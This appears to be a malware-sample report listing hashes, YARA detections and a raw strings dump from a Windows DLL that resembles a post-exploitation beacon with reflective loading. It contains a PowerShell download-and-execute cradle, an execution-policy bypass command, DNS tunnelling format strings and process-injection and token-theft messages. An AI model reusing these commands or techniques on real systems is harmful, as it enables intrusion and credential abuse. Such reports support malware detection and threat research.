Sample details: 38cdcda930fabb623a5ae01b6bbc8b8a --

Hashes
MD5: 38cdcda930fabb623a5ae01b6bbc8b8a
SHA1: 9e2eb5945c488e733ff683a60488b26441c4ee73
SHA256: bbe3fd9f09bd0277819f13830fb3adc43b3791211230299212271e2c75c488b5
SSDEEP: 3072:HNEfMCK7JqusgLiKG5TnN7FgkQB7R80kUzRe5v1:SfM5dS/JBN7jiR80V0
Details
File Type: PE32
Yara Hits
YRP/Visual_Cpp_2005_DLL_Microsoft | YRP/Visual_Cpp_2003_DLL_Microsoft | YRP/IsPE32 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/anti_dbg | YRP/inject_thread | YRP/create_service | YRP/network_http | YRP/network_dns | YRP/escalate_priv | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/VC8_Random | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader | FlorianRoth/ReflectiveLoader | FlorianRoth/Beacon_K5om |
Strings
		!This program cannot be run in DOS mode.
rERich
`.rdata
@.data
@.reloc
D$HSVWh
QQSVW3
SWjD_W
SVWjD_W
0VVVVV
SSSh{D
QSVWj@
tcj@ShI
tDHt(HuV
PSSSSSSh 
YYSSPh
8<+tz<-tz
D$,PSP
0SSSSS
PRSVWj
YY_^[ZX
HHtXHHt
>If90t
HHtYHHt
0A@@Ju
<at9<rt,<wt
URPQQh
0WWWWW
j@j ^V
>=Yt1j
< tK<	tG
0SSSSS
0SSSSS
0SSSSS
^SSSSS
j"^SSSSS
v	N+D$
t"SS9]
PPPPPPPP
PPPPPPPP
tGHt.Ht&
^SSSSS
8VVVVV
;t$,v-
UQPXY]Y[
t+WWVPV
u8VVVVj
0WWWWW
AAFFf;
>=Yt1j
rijndael
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
,cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
}}}}cc
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
"3DUfw
"3DUfw
"3DUfw
CorExitProcess
runtime error 
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program: 
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
ADVAPI32.DLL
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corrupted
A local variable was used before it was initialized
Stack memory was corrupted
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
Run-Time Check Failure #%d - %s
Unknown Module Name
Unknown Filename
Stack corrupted near unknown variable
Stack around _alloca corrupted
Local variable used before initialization
Stack memory corruption
Cast to smaller type causing loss of data
Stack pointer corruption
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
MSPDB80.DLL
EnvironmentDirectory
SOFTWARE\Microsoft\VisualStudio\9.0\Setup\VS
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
PDBOpenValidate5
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
127.0.0.1
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Started service %s on %s
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
IsWow64Process
kernel32
Could not open '%s'
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
syswow64
system32
NtQueueApcThread
process
Could not connect to pipe: %d
%d	%d	%s
Kerberos
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
%d	%d	%d.%d	%s	%s	%s	%d	%d
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
?%s=%s
%s&%s=%s
%s%s: %s
Could not kill %d: %d
%s	%d	%d
%s	%d	%d	%s	%s	%d
sha256
abcdefghijklmnop
could not create pipe: %d
I'm already in SMB mode
%s (admin)
Could not open process: %d (%u)
Could not open process token: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
Microsoft Base Cryptographic Provider v1.0
?456789:;<=
 !"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
GetTickCount
GetLocalTime
GetCurrentProcessId
CreateFileA
WaitForSingleObject
SetFileTime
WriteFile
CreateProcessA
GetEnvironmentVariableA
DisconnectNamedPipe
FlushFileBuffers
SetCurrentDirectoryA
GetStartupInfoA
GetLastError
GetCurrentDirectoryW
CreatePipe
GetCurrentDirectoryA
GetFileTime
CloseHandle
GetCurrentProcess
ConnectNamedPipe
GetCurrentThread
ReadFile
GetProcAddress
CreateNamedPipeA
GetModuleHandleA
GetVersionExA
CreateThread
GetFullPathNameA
SystemTimeToTzSpecificLocalTime
GetLogicalDrives
ExpandEnvironmentStringsA
GetFileAttributesA
FileTimeToSystemTime
FindFirstFileA
FindClose
FindNextFileA
CreateRemoteThread
OpenProcess
VirtualAllocEx
WriteProcessMemory
FreeLibrary
VirtualFree
Thread32First
Thread32Next
SetLastError
VirtualAlloc
LoadLibraryA
OpenThread
CreateToolhelp32Snapshot
SuspendThread
ResumeThread
PeekNamedPipe
WaitNamedPipeA
SetNamedPipeHandleState
LocalAlloc
LocalFree
GetComputerNameA
Process32First
TerminateProcess
Process32Next
ProcessIdToSessionId
KERNEL32.dll
CreateProcessAsUserA
CloseServiceHandle
CreateProcessWithLogonW
DeleteService
CreateServiceA
StartServiceA
CreateProcessWithTokenW
QueryServiceStatus
OpenSCManagerA
OpenServiceA
OpenProcessToken
OpenThreadToken
LookupPrivilegeValueA
ImpersonateLoggedOnUser
ImpersonateNamedPipeClient
QueryServiceStatusEx
ControlService
AdjustTokenPrivileges
GetUserNameA
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
GetTokenInformation
LookupAccountSidA
DuplicateTokenEx
AllocateAndInitializeSid
RevertToSelf
FreeSid
CheckTokenMembership
LogonUserA
ADVAPI32.dll
HttpQueryInfoA
InternetConnectA
InternetQueryDataAvailable
InternetReadFile
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
InternetQueryOptionA
WININET.dll
WS2_32.dll
DnsQuery_A
DnsFree
DNSAPI.dll
GetIfEntry
GetIpAddrTable
IPHLPAPI.DLL
LsaLookupAuthenticationPackage
LsaConnectUntrusted
LsaCallAuthenticationPackage
Secur32.dll
HeapFree
HeapAlloc
GetModuleHandleW
ExitProcess
MultiByteToWideChar
DeleteFileA
CreateDirectoryA
RemoveDirectoryA
GetCurrentThreadId
GetCommandLineA
GetSystemTimeAsFileTime
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
HeapDestroy
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
GetStdHandle
GetModuleFileNameA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
RtlUnwind
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
SetHandleCount
GetFileType
SetFilePointer
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
RaiseException
DebugBreak
HeapSize
GetLocaleInfoA
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetStdHandle
GetProcessHeap
GetModuleFileNameW
VirtualQuery
SetEndOfFile
CompareStringA
CompareStringW
SetEnvironmentVariableA
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
SetEnvironmentVariableW
57dc74.dll
_ReflectiveLoader@4
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ihihikiiikihik}
ijikimii
	imikimiyiiilihikiiioihiki
inijhiY
dhhhlij
Fkjhihiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiaijhi]_G[PGX_XG^^EF66
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii`iji
F]GYIA
RI$: ,IQGYRI>
I'=I_GXRI=
F]GY@iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiciji)F
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibijhiiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiieijhiiiiniiiiiiijiiioiiio*
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiidijhiiiiciiiO*
iiiniiiiiiiliiik
iiiniiihiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiitiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiwiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiifiji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivihikihizikimiiiii}ikimiiiiisijiy.,=iiiiiiiiiiiiiirijiy9&:=iiiiiiiiiiiiiuikimiiiiiyihikiiixihikiii{ihikiiii
D$$[[aYZQ
6QQh8h
AQAPRQVH1
AXAX^YZAXAYAZH
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4
7'797V7b7z7
7+878U8`8
;3<V<]<X=
=<>B>P>`>u>{>
1+1D1J1l1
203\3g3
4!5-5=5y596u6
627d7r7
8+878^8h8t8
97:s:}:
=I>p>}>
?&?,?S?
1X2d2p2{2
2 3/383b3o3{3
4/4@4R4c4
5 5+51575X5k5|5
717;7B7I7P7W7^7e7l7s7z7
8%8D8i8p8w8
819V9\9t9
:8:>:D:N:T:a:r:
333\3x3
3(4F4L4m4
5$5D5W5
6#6+6g6
7.8@8I8[8{9
:::G:R:}:
;&;F;x;
;%<0<6<l<
=>>C>I>U>m>
>>?I?|?
1,1A1o1{1
4%43484>4P4Z4i4
72888>8D8J8]8
:&:6:<:N:f:|:
;$<4<P<e<v<
>G?`?n?
1-2V2f2x2
3!4V4d4
4	5%595[5w5
>W>[>_>c>g>k>o>s>w>{>
1"191Z1q1
2"232A2S2Y2
2 3>3r3
4F4[4z4
1!1'181I1O1Y1j1{1
2)292H2N2\2b2h2o2
3&393?3E3K3Q3g3p3v3
3$4\4v4
606:6A6I6U6\6e6
7%8:8J8
:#:3:M:U:";/;c;s;
8S8\8a8{8
:H;S;i;
<,<D<Q<q<
=(=^=i=
=3>A>a>g>t>
?*?2?9?|?
30>0T0o0w0~0
6$6&7]:a:e:i:m:q:u:y:}:
="=/=9=O=b=
><>P>j>
0:0Q0d0~0
2'2;2W2
3)3B3Z3o3
;!<8<F<]<'=
0&0X0\0`0d0h0l0p0t0x0|0
0 5I5]5
3!494V4
8"9)999D9l9s9
9c:j:u:
:'<.<><I<k<r<
=P=W=g=r=
>">2>=>d>k>{>
>	?l?s?
2@2G2W2b2
2%3,3<3G3h3o3
404F4]4p4
6*6A6T6
989D9P9
:!:p:v:
;%;\;m;
0&0.0>0S0
 1*1R1\1
1n2s2}2
3#3>3n3
6 6$6(6,60646~6
7#7(7,707Q7{7
8 8$8(8,8?=
u>y>}>
N0\0p1
2%2-252=2I2R2W2]2g2p2{2
3/3r3w3
4A4O4U4x4
8+808?8H8U8`8r8
9+92979@9M9S9m9~9
M0X0`0u0
3J3O3w3
3"4I4V4{5
627P7v7
2%272	3
3 3;3B3Z3
4.454I4P4h4t4z4
5"5/5R5g5
8#8+81888>8E8K8S8Z8_8g8p8|8
9)9I9O9k9
:-:V:[:r:
<\=b={=
=Q>V>[>`>p>
>>?C?J?O?V?[?
1B2V2|2
2)2<2`2
5'5@5\5e5k5t5y5
:":0:E:O:u:
303G4[4|4
6!6s6y6
7$7D7^7
7(919=9t9}9
:):A:P:
<\=b=x=
2.3]3~3
9!9(9,9094989<9@9D9
:,:3:8:<:@:a:
:*;0;4;8;<;
<#<2<7<A<O<
1!1L2j2X3
6$6.666A6q6
:*:1:a:
?'?4?9?G?
2,2?2Q2
636>6U6z6
;9<S<\<
4;5>6I6Z6`6f6z6
3D4a4j4v4
:H:T:c:o:
= =&=,=2=8=>=D=J=P=V=\=b=h=n=
2"2.272J2
9'969q9 :
H3L3P3T3X3d3h3
H8L8P8T8X8\8
8>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?(?|?
3 3@3\3`3
4,404P4l4p4
505<5X5x5
64686X6x6
7 7@7`7
3$3,343<3D3L3T3\3d3l3p3t3
8@9P9`9p9
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>x>